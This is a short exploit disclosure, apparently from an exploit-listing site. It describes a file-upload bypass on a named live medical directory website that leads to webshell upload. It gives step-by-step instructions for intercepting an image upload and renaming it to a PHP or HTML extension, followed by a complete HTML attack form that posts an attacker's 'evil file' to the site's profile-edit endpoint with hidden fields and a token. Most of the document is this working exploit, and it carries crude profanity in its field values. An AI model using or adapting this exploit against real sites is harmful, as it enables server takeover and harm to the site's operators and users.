www.dztabib.com File upload vunlerability Leads to webshell upload

2019.06.03
dz Dj3Bb4rAn0n_Dz (DZ) dz
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

########################################################################## # Ttitle : www.dztabib.com File upload vunlerability Leads to webshell & HTML files upload # Founder : Dj3Bb4rAn0n ( bassem ) FB/djebbar.bassem.16 # Date : /02/06/2019 # Home : Annaba ( Algeria ) # Tested on : Linux ( Backbox ) ########################################################################## # PoC [ + ] Register as user in the website [ + ] Login to your account [ + ] Go to this path :https://www.dztabib.com/parametres [ + ] Upload your evil file with jpeg extenction don't forget to intercept the request with burp or tamper data then change the extenction into .Php3 or html after that forward the request Example : https://www.dztabib.com/storage/photo_profil/bBuSUDVeBeHTg0OTusInIVCXYzUkpuB57laqzrEx. --------------------------------------------------------------------- <!-- FIle upload poc --> <html lang="en"> <head> <title>FIle upload PoC</title> <link href="https://fonts.googleapis.com/css?family=Iceland" rel="stylesheet"> <style> button{border:2px solid #F00;border-radius:2px;} input{border:2px solid #F00;border-radius:2px;width:100px;} body .n00bi{font-family:'Iceland', cursive;color:green;text-shadow:2px 2px #F00;} </style> <script> function alert_me(){ var Domain = "www.dztabib.com" alert("Path of Evil file : \n" + Domain + "/storage/photo_profil/" + "[ Evil ]"); } </script> </head> <body style="background-image:url(https://media.giphy.com/media/smzfl3E7a4iHK/giphy.gif);text-align:center" onload="alert_me()"> <div class="n00bi"> <header> <h1> simple File upload form By Dj3Bb4rAn0n</h1> </header> </div><br> <div class="content_img"> <article> <img src="https://www.upload.ee/image/10006478/a.jpg" alt="I'm n00b :V" /> </article> </div><br> <form class="form-group" action="https://www.dztabib.com/edit/profile" method="post" enctype="multipart/form-data"> <input type="hidden" name="_token" value="2TDQZOjUU28MU9iuGrXbZm2p7RZkbkrcPTuw0M4S"> <!-- Change it with your token --> <input type="hidden" name="_method" value="PUT"> <input type="hidden" class="form-control" name="name" value="fuckyou" > <input type="hidden" class="form-control" name="prenom" value="fuckyou" > <input id="age" type="hidden" class="form-control" name="age" value="20" required autofocus> <input id="wilaya" type="hidden" class="form-control" name="wilaya" value="fuckyou" required autofocus> <input id="adresse" type="hidden" class="form-control" name="adresse" value="fuckyou@gmail.com" required autofocus> <!-- Change it with your email --> <input id="photo" type="file" class="form-control" name="photo" > <input id="email" type="hidden" class="form-control" name="email" value="FUCKER1@gmail.com" required> <button type="submit" class="n00b">Submit the request</button> </form> </body> </html> -------------------------------------------------------------- Sh00tz To my PC -------------------------------------------------------------


See this note in RAW Version
Vote for this issue:
100%
0%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top